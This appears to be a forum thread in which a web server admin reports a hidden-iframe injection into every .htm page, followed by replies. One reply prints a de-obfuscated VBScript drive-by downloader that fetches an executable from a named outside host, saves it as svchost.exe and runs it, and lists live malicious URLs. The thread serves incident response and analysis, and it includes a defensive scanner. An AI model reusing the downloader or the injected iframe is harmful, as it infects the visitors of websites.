Server infected by a trojan

s

Hi folks,
Hoping someone here might be able to give some advice on an infection.
Today at around 9:42am my local time one of my web servers got infected
somehow. Whatever infected it then scanned through all .htm files on
the server and added the following line near the bottom of each one.

I've removed the domain name:-
<iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
height=0></iframe>


So, any time someone tried to view a site on my server they were also
directed to a Trojan download.

I have since removed these lines from all the .htm files but I have no
idea how someone managed to run a program on my server that inserted all
these lines.

Obviously I'm no expert on security etc but I have tried to make sure my
firewall is up to a reasonable standard and also have Norton AV
Corporate running on the server.

Any advice/help is much appreciated.
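For scoping an injection like the one described above, here is an added example (not code from the thread): a small Python scanner that walks a document root, flags .htm/.html files containing a zero-sized external iframe (it also accepts the misspelled "widht" seen in the injected line), and can strip the tag. The sample page and its domain are constructed placeholders.

```python
import re
from pathlib import Path

# Hidden <iframe> with an absolute http(s) src and zero width/height; "widht" is
# accepted because the line injected in this incident misspells "width".
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?(https?://[^\s\"'>]+)[^>]*"
    r"\b(?:width|widht)\s*=\s*[\"']?0\b[^>]*\bheight\s*=\s*[\"']?0\b[^>]*>"
    r"(?:\s*</iframe\s*>)?",
    re.IGNORECASE,
)

# Constructed sample page; the domain is a placeholder, not the one from the thread.
SAMPLE = """<html><body>
<p>Welcome</p>
<iframe src=http://www.placeholder-domain.example/hkeraone/hker.htm widht=0
height=0></iframe>
</body></html>
"""

def find_hidden_iframes(html):
    """Return the src URLs of every zero-sized external iframe in one document."""
    return [m.group(1) for m in HIDDEN_IFRAME.finditer(html)]

def strip_hidden_iframes(html):
    """Remove the injected tags; returns (cleaned_html, number_removed)."""
    return HIDDEN_IFRAME.subn("", html)

def scan_tree(root, suffixes=(".htm", ".html")):
    """Walk root and map each affected file to the injected URLs it contains."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            urls = find_hidden_iframes(path.read_text(errors="replace"))
            if urls:
                hits[str(path)] = urls
    return hits

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "index.htm").write_text(SAMPLE)
        (Path(tmp) / "about.htm").write_text("<html><body>clean</body></html>")
        for path, urls in scan_tree(tmp).items():
            print(path, "->", urls)
    cleaned, removed = strip_hidden_iframes(SAMPLE)
    print("removed", removed, "tag(s)")
```

Cleaning the files does not close the entry point; the list of hits is mainly useful for scoping the incident and for comparing each file's modification time against the time the injection started.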
 
Gabriele Neukam

Today at around 9:42am my local time one of my web servers got infected
somehow. Whatever infected it then scanned through all .htm files on the
server and added the following line near the bottom of each one.

I've removed the domain name:-
<iframe src=http://www.<DOMAINNAME>.com/hkeraone/hker.htm widht=0
height=0></iframe>

Maybe it is related to this incident

http://www.heise-security.co.uk/news/95591


Gabriele Neukam

--
Is there such a thing as a Honeymoon period in a new newsgroup?
(Roger Hunt in uk.comp.vintage)
In a want it now instantly straight away world - no :)
(Krustov in ucv)
 
jen

s said:
It could well be related, I really don't know.
What I don't understand is how hackers get the server to run something
that then scans all the .htm files and injects the iframe line.

Maybe reading this will enlighten you some (Google is your friend):

Virus Attack on web server
Iframe code getting added to each page request:
http://www.webmasterworld.com/microsoft_asp_net/3279736.htm

large-scale web attacks targeting sites and their users:
http://arstechnica.com/news.ars/pos...over-massive-attack-on-italian-web-sites.html

-jen
 
Virus Guy

s said:
(...) hker.htm

While searching the web for instances of kher.htm, I came across
these:

(warning - do not follow these links unless you know what you're
doing)

www.goldwindos2000.com/hkeraone/test.htm
us6.redhat520.com/haoba.htm

They are really executable files (not htm).

As of around 2 pm (EST), test.htm is identified mostly as a
downloader.trojan (4608.KF / 4608.102). Detection rate is 47% (not
detected by Kaspersky, Symantec among others).

haoba.htm is identified as Explorer.Hijack.AJYS / .4080. Detection
rate is 37%. Not detected by Avast, F-prot, Kaspersky, McAfee,
Microsoft, Symantec, among others.

---------------------------------

hker.htm is being coded with random spaces to give different MD5
hashes.

I submitted a sample to VT, and only 2 AVs id'd it as a threat:

Authentium: VBS/Psyme.BT@dl
NOD32v2: JS/Exploit.ADODB.Stream.Y

See this:

http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=VBS_PSYME.FP

When you take out the spaces, here's what it is (can someone decode
this script and print the URL?)

(I removed a few < and > because my nntp server doesn't like HTML code
I guess)

html
scriptlanguage="VBScript"
onerrorresumenext
dl="http://www.goldwindos2000.com/hkeraone/test.htm"
Setdf=document.createElement("object")
df.setAttribute"classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Setx=df.CreateObject(strb,"")
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
stra=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15
setS=df.createobject(stra,"")
S.type=1
c4="G"
c5="E"
c6="T"
strc=c4&c5&c6
x.Openstrc,dl,False
x.Send
fname1="svchost.exe"
setF=df.createobject("Scripting.FileSystemObject","")
settmp=F.GetSpecialFolder(2)
S.open
fname1=F.BuildPath(tmp,fname1)
S.writex.responseBody
S.savetofilefname1,2
S.close
setQ=df.createobject("Shell.Application","")
Q.ShellExecutefname1,"","","open",0
/script
head
title Hello!!! /title
/head body
/body /html
 
